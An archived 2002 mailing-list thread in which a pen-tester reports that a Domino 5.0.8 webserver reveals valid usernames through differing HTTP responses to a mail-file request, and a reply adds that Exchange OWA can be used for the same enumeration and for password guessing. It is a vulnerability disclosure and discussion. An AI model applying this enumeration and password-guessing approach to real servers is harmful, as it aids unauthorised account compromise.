Sure do. Excellent tool for enumeration. Same holds true for OWA for
exchange. This gives me the ability, over time, to guess out how the
usernames are formed, and provides me with an externally available tool
for initial password guessing.

-----Original Message-----
From: nicobnicob.net [mailto:nicobnicob.net]
Sent: Wednesday, January 30, 2002 8:55 AM
To: vuln-devsecurityfocus.com
Subject: Enumerating users on a Domino webserver

Hi,

during a pen-test against a Domino 5.0.8 webserver, I was able to
enumerate valid users.

A simple "GET /mail/toto.nsf HTTP/1.0" redirects to the login page (with
a "200 OK"
HTTP code) if the user "toto" exists and a "404 File not Found" is
returned if the user
doesn't exist.
This issue can allow a faster brute force attack on HTTP passwords.

I have search the Net for more information about this problem, but I
found nothing.

Can the readers reproduce this behaviour ?
Do you see others implications than users enumeration (for social
engineering and brute
force attacks) ?

Nicob

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]